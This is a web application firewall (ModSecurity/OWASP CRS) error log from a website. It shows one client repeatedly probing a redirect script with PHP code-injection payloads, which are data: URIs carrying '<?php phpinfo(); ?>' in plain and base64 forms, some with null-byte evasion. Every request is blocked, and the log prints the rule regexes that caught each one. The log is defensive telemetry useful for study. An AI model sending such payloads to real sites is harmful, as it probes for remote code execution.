[Tue May 12 05:36:47.856342 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihgwAAAFY"]
[Tue May 12 05:36:47.856559 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgT9r1yOh9TvizezihgwAAAFY"]
[Tue May 12 05:36:48.094098 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo()|phpinfo()|phpinfo() found within ARGS:url: phpinfo()|phpinfo()|phpinfo()"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhAAAAFY"]
[Tue May 12 05:36:48.094635 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhAAAAFY"]
[Tue May 12 05:36:48.094874 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: High-Risk PHP Function Call Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhAAAAFY"]
[Tue May 12 05:36:48.331850 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhQAAAFY"]
[Tue May 12 05:36:48.332068 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:, found within ARGS:url: data:,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhQAAAFY"]
[Tue May 12 05:36:48.332397 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhQAAAFY"]
[Tue May 12 05:36:48.332584 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhQAAAFY"]
[Tue May 12 05:36:48.569735 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhgAAAFY"]
[Tue May 12 05:36:48.569787 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhgAAAFY"]
[Tue May 12 05:36:48.570048 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:,<?php phpinfo(); ?>\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhgAAAFY"]
[Tue May 12 05:36:48.570258 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:, found within ARGS:url: data:,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhgAAAFY"]
[Tue May 12 05:36:48.570653 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhgAAAFY"]
[Tue May 12 05:36:48.570911 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhgAAAFY"]
[Tue May 12 05:36:48.808485 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:text/plain,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhwAAAFY"]
[Tue May 12 05:36:48.808721 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:text/plain, found within ARGS:url: data:text/plain,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhwAAAFY"]
[Tue May 12 05:36:48.809127 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhwAAAFY"]
[Tue May 12 05:36:48.809372 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUNr1yOh9TvizezihhwAAAFY"]
[Tue May 12 05:36:49.046700 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiAAAAFY"]
[Tue May 12 05:36:49.046754 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiAAAAFY"]
[Tue May 12 05:36:49.047029 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:url: data:text/plain,<?php phpinfo(); ?>\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiAAAAFY"]
[Tue May 12 05:36:49.047245 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:text/plain, found within ARGS:url: data:text/plain,<?php phpinfo(); ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiAAAAFY"]
[Tue May 12 05:36:49.047653 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiAAAAFY"]
[Tue May 12 05:36:49.047877 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiAAAAFY"]
[Tue May 12 05:36:49.285297 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihigAAAFY"]
[Tue May 12 05:36:49.285392 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:; found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihigAAAFY"]
[Tue May 12 05:36:49.285769 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihigAAAFY"]
[Tue May 12 05:36:49.285999 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihigAAAFY"]
[Tue May 12 05:36:49.523339 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiwAAAFY"]
[Tue May 12 05:36:49.523393 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiwAAAFY"]
[Tue May 12 05:36:49.523812 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUdr1yOh9TvizezihiwAAAFY"]
